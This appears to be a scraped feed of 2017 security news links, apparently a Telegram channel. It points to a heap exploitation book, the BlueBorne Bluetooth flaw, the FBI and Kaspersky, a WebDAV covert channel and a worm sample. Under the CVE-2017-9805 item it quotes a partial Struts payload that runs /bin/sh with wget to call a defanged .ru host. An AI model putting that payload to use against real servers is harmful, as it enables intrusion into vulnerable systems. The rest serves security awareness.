Heap Exploitation
This short book is written for people who want to understand the internals of 'heap memory', particularly the implementation of glibc's 'malloc' and 'free' procedures, and also for security researchers who want to get started in the field of heap exploitation.
https://www.gitbook.com/book/dhavalkapil/heap-exploitation/details
This short book is written for people who want to understand the internals of 'heap memory', particularly the implementation of glibc's 'malloc' and 'free' procedures, and also for security researchers who want to get started in the field of heap exploitation.
https://www.gitbook.com/book/dhavalkapil/heap-exploitation/details
GitBook
Heap Exploitation · GitBook
heap-exploitation: This book on heap exploitation is a guide to understanding the internals of glibc's heap. It also describes, in detail, various attacks possible on the heap structure.
High Sierra's 'Secure Kernel Extension Loading' is Broken
› a new 'security' feature in macOS 10.13, is trivial to bypass
https://objective-see.com/blog/blog_0x21.html
› a new 'security' feature in macOS 10.13, is trivial to bypass
https://objective-see.com/blog/blog_0x21.html
CVE-2017-9805
<string>/bin/sh</string><string>-c</string><string>wget -qO /dev/null http://xxx [.]ru:8082/?
<string>/bin/sh</string><string>-c</string><string>wget -qO /dev/null http://xxx [.]ru:8082/?
echo ...vulnerablesite...</string>Using WebDAV PROPFIND only requests as a C2 channel. The why, the how, and the tool in this blog post: https://arno0x0x.wordpress.com/2017/09/07/using-webdav-features-as-a-covert-channel/amp/
arno0x0x
Using WebDAV features as a covert channel
I’ve recently been looking into a fancy covert channel, targeting Windows familly operating systems, for either: deliver various malicious payloads (shellcode, binaries, scripts, whateverR…
This software builds a dynamic graphical website showing the computers with their hostnames and IP addresses in the local network. https://github.com/KruDex/lan-monitor/blob/master/README.md
GitHub
KruDex/lan-monitor
lan-monitor - Simple website to display the LAN status based on a nmap scan
FBI reportedly advising companies to ditch Kaspersky apps
The law enforcement agency has met with firms in the energy and tech sectors.
https://www.engadget.com/2017/08/21/fbi-kaspersky-lab-private-sector/?utm_source=tpx.mx
The law enforcement agency has met with firms in the energy and tech sectors.
https://www.engadget.com/2017/08/21/fbi-kaspersky-lab-private-sector/?utm_source=tpx.mx
Engadget
FBI reportedly advising companies to ditch Kaspersky apps
The FBI has reportedly been briefing firms on the cyberespionage threat posed by Kaspersky.
The IoT Attack Vector “BlueBorne” Exposes Almost Every Connected Device https://www.armis.com/blueborne/#/technical
Armis
BlueBorne Cyber Threat Impacts Amazon Echo and Google Home
Following the disclosure of the BlueBorne attack vector this past September, Armis discovered that critical Bluetooth vulnerabilities impact the Amazon Echo and Google Home.
Anyone know more about this Golang ELF SSH Scanner/Bruteforcer/Worm? No persistence #IoT #HoneyPot
https://pastebin.com/agDytSDS
https://pastebin.com/agDytSDS
Best Buy elimina las ventas de Kaspersky por sospechas de espionaje
https://www.redeszone.net/2017/09/11/best-buy-elimina-las-ventas-kaspersky-sospechas-espionaje/
https://www.redeszone.net/2017/09/11/best-buy-elimina-las-ventas-kaspersky-sospechas-espionaje/
Documento de los detalles técnicos que afectan a los dispositivos Bluetooth usando el ataque BlueBorne
http://go.armis.com/hubfs/BlueBorne%20Technical%20White%20Paper.pdf
http://go.armis.com/hubfs/BlueBorne%20Technical%20White%20Paper.pdf
0patching Stream Object Remote Code Execution in Acrobat Reader DC (CVE-2017-11254)
https://www.youtube.com/watch?v=HOGYQStnPaU
https://www.youtube.com/watch?v=HOGYQStnPaU
YouTube
0patching Stream Object Remote Code Execution in Acrobat Reader DC (CVE-2017-11254)
This video demonstrates micropatching of CVE-2017-11254, a use-after-free bug in Acrobat Reader DC that gets exploited by a opening a malicious PDF. First, a...
This media is not supported in your browser
VIEW IN TELEGRAM
Passing data through UNIX file privilege numbers (RWX Triplets)
https://github.com/operatorequals/chmod-stego
https://github.com/operatorequals/chmod-stego